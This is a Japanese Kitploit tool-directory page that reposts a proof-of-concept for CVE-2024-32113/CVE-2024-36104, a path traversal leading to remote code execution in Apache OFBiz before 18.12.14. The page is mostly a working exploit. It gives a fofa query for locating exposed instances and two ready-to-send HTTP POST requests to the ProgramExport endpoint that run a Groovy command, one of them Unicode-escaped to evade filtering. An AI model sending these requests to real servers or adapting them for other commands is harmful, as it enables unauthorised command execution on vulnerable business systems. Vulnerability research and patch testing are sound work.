Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-32113 — Apache OFBIZ パストラバーサルによる RCE POC[CVE-2024-32113 & CVE-2024-36104] | Kitploit
ツール/GitHubGitHub/mr-xn/cve-2024-32113
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubmr-xn/cve-2024-32113

CVE-2024-32113

Apache OFBIZ パストラバーサルによる RCE POC[CVE-2024-32113 & CVE-2024-36104]

リポジトリを見る
2772年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2024-32113

Apache OFBiz のパストラバーサルにより RCE に至る PoC。

Apache OFBiz における、制限付きディレクトリへのパス名の制限不備('Path Traversal')の脆弱性。この問題は Apache OFBiz 18.12.14[含まない] より前のバージョンに影響します。ユーザーは問題を修正したバージョン 18.12.14 へのアップグレードを推奨されます。

fofa クエリ

app="Apache_OFBiz"

POC

root@kitploit:~
POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1:8443

groovyProgram=throw+new+Exception('id'.execute().text);

ユニコードで id を実行します。

root@kitploit:~
POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1:8443

groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

SCR-20240603-uowf

参照

  • https://issues.apache.org/jira/browse/OFBIZ-13006
  • https://xz.aliyun.com/t/14733
ツールをダウンロード